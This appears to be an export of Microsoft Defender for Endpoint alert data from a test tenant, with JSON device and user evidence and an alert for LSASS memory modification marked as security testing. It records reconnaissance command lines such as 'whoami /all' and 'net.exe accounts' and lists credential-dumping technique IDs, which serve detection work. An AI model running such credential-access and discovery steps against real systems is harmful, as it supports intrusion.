"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "1521f019fe55cffe753941d0fb207004db26ea8f",
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Clean"
},
{
"aadUserId": null,
"accountName": "system",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-11-16T16:01:04.1333333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-09-30T06:24:37.89Z | Suspicious | None | null | null | null | null | null | null | null | null | null | 0 | whoami /all | 0001-01-01T00:00:00Z | 0 | 0001-01-01T00:00:00Z | null | null | null | null |
da638045933184312045_2052783927 | c4dc252d-d37b-491f-866a-70d480e88165 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:08:38.4312196Z | 2022-11-26T01:35:43.17Z | 2022-11-26T01:35:43.0633333Z | 2022-11-21T02:02:24.517617Z | 2022-11-21T02:34:24.5130039Z | LSASS process memory modified | The Local Security Authority Subsystem Service (LSASS) process enforces security policy by verifying user logons and password changes. Attackers might modify LSASS memory to bypass security mechanisms or circumvent legitimate checks. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | eb025de4-0ad4-4fcb-8ce2-711ee3956107 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1003",
"T1003.001",
"T1547.005"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:08:38.4733333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-16T15:26:50.78Z | Suspicious | None | user1 | NT AUTHORITY | S-1-5-18 | null | null | 069beb39e03b378493f1a2db5113c3ef62216a46 | fddc5f29f779a6ef73d70a2c551397fdee63f549f2bce4fe6a7aeedc11f4f72e | net.exe | C:\Windows\System32 | 4,748 | "net.exe" accounts | 2022-11-16T10:05:18.6390263Z | 912 | 2022-11-16T10:04:38.1400707Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 7114973b832b32d349815a5d2811738cc10fa650 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.